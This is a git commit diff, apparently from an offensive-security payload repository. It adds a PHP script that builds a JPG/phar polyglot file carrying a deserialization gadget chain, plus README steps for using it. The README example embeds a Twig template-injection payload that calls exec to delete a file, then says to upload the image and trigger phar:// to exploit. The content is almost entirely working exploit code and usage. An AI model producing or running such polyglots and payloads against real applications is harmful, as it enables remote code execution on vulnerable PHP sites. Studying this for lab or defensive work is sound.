add phar polyglot from @kunte0

tree · tree · commit ef5c521ae862 · 2020-11-07T02:03:09.000+08:00
diff --git a/deserialize/php-phar/README.md b/deserialize/php-phar/README.md
@@ -16,6 +16,16 @@ $ php phar_generate.php
 $ php phar_vuln.php
 ```
 
+## Polyglot between JPG & phar
+
+Edit `phar-jpg-poly.php` to build unserialize gadget chain, place base image (in.jpg) in current directoy.
+```bash
+$ php phar-jpg-poly.php "{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('rm /home/carlos/morale.txt')}}"                  
+string(211) "O:14:"CustomTemplate":1:{s:18:"template_file_path";O:4:"Blog":2:{s:4:"user";s:0:"";s:4:"desc";s:106:"{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('rm /home/carlos/morale.txt')}}";}}"
+```
+
+Now, upload `out.jpg` & trigger phar://path/to/image to exploit!!
+
 ## Reference
 
 * https://medium.com/@knownsec404team/extend-the-attack-surface-of-php-deserialization-vulnerability-via-phar-d6455c6a1066
diff --git a/deserialize/php-phar/phar-jpg-poly.php b/deserialize/php-phar/phar-jpg-poly.php
@@ -0,0 +1,78 @@
+<?php
+
+
+function generate_base_phar($o, $prefix){
+    global $tempname;
+    @unlink($tempname);
+    $phar = new Phar($tempname);
+    $phar->startBuffering();
+    $phar->addFromString("test.txt", "test");
+    $phar->setStub("$prefix<?php __HALT_COMPILER(); ?>");
+    $phar->setMetadata($o);
+    $phar->stopBuffering();
+    
+    $basecontent = file_get_contents($tempname);
+    @unlink($tempname);
+    return $basecontent;
+}
+
+function generate_polyglot($phar, $jpeg){
+    $phar = substr($phar, 6); // remove <?php dosent work with prefix
+    $len = strlen($phar) + 2; // fixed 
+    $new = substr($jpeg, 0, 2) . "\xff\xfe" . chr(($len >> 8) & 0xff) . chr($len & 0xff) . $phar . substr($jpeg, 2);
+    $contents = substr($new, 0, 148) . "        " . substr($new, 156);
+
+    // calc tar checksum
+    $chksum = 0;
+    for ($i=0; $i<512; $i++){
+        $chksum += ord(substr($contents, $i, 1));
+    }
+    // embed checksum
+    $oct = sprintf("%07o", $chksum);
+    $contents = substr($contents, 0, 148) . $oct . substr($contents, 155);
+    return $contents;
+}
+
+// ======= modify here =======
+
+class CustomTemplate{
+}
+class Blog{
+        public $user;
+        public $desc;
+        public function __construct($user, $desc) {
+            $this->user = $user;
+            $this->desc = $desc;
+        }
+}
+
+// pop exploit class
+$object = new CustomTemplate();
+$object->template_file_path = new Blog("", $argv[1]);
+
+// ===========================
+
+// config for jpg
+$tempname = 'temp.tar.phar'; // make it tar
+$jpeg = file_get_contents('in.jpg');
+$outfile = 'out.jpg';
+$payload = $object;
+$prefix = '';
+
+var_dump(serialize($object));
+
+
+// make jpg
+file_put_contents($outfile, generate_polyglot(generate_base_phar($payload, $prefix), $jpeg));
+
+/*
+// config for gif
+$prefix = "\x47\x49\x46\x38\x39\x61" . "\x2c\x01\x2c\x01"; // gif header, size 300 x 300
+$tempname = 'temp.phar'; // make it phar
+$outfile = 'out.gif';
+
+// make gif
+file_put_contents($outfile, generate_base_phar($payload, $prefix));
+
+*/
+
